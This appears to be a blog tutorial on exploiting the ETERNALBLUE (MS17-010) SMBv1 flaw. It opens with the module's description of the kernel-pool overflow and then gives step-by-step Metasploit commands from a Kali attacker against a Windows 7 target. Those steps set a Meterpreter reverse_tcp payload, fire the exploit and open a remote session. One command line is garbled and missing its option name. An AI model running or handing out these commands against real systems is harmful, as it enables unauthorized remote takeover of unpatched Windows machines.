This module is a port of the Equation Group
ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers.
There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD
is subtracted into a WORD. The kernel pool is groomed so that overflow is well
laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in
srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not
trigger 100% of the time, and should be run continuously until triggered. It
seems like the pool will get hot streaks and need a cool down period before the
shells rain in again.
Let’s start!!!
Attacker: Kali
Linux
Target: window 7
Open the terminal in your Kali Linux type msfconsole to
load metasploit framework.
msfconsole
Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) >set 192.168.1.21
msf exploit(ms17_010_eternalblue) >set payload
windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit
From screenshot you can see we have got meterpreter
session after buffer overflow exploited by overwriting SMBV1 buffer.
Meterpreter>
sysinfo
0 comments:
Post a Comment